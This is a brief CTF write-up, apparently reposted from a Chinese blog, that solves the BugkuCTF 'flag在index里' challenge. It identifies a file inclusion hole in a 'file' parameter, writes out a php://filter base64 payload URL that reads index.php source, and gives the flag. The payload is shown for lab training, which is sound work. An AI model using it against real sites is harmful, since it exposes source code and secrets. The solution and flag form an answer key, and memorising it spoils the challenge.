BugkuCTF–flag在index里
生活随笔
收集整理的這篇文章主要介紹了
BugkuCTF–flag在index里
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
注意到url地址??http://123.206.87.240:8005/post/index.php?file=show.php
這是一個典型的文件包含漏洞,(file關鍵字是提示,其實也是CTF的套路)。
http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
故:flag{edulcni_elif_lacol_si_siht}
總結
以上是生活随笔為你收集整理的BugkuCTF–flag在index里的全部內容,希望文章能夠幫你解決所遇到的問題。